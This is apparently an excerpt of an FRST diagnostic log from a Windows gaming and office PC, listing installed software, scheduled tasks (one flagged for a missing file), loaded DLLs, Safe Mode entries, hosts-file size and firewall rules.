LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
Scansoft PDF Professional (x32 Version: - ) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {2F2930D6-5ED7-4563-8CC0-D92C411FA7B9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 21:00 - 2015-07-10 23:14 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-03-01 12:14 - 2016-03-01 12:14 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022901\algo.dll
2016-03-01 20:49 - 2016-03-01 20:49 - 02836480 _____ () C:\Program Files\AVAST Software\Avast\defs\16030100\algo.dll
2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

There are 7870 more sites.



==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts


There are 15468 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
